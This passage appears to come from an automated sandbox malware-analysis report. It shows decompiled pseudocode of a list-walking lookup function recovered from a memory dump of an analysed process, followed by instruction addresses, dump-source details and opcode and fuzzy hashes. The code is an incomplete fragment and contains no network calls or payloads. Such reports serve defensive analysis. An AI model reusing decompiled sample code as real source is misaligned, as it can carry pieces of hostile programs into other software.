					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                                              0x0040317f
                                              0x00403180
                                              0x00403180
                                              0x00403180
                                              0x0040318d
                                              0x00403196
                                              0x00403199
                                              0x0040319b
                                              0x004031a1
                                              0x004031a9
                                              0x004031ab
                                              0x004031ac
                                              0x004031ae
                                              0x00000000
                                              0x004031b0
                                              0x004031b3
                                              0x004031c2
                                              0x004031c7
                                              0x004031cd
                                              0x004031e0
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004031cd
                                              0x004031d7
                                              0x004031dd
                                              0x004031cf
                                              0x004031cf
                                              0x004031d1
                                              0x004031d5
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                              • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                              • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                              • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                              Uniqueness

                                              Uniqueness Score: -1.00%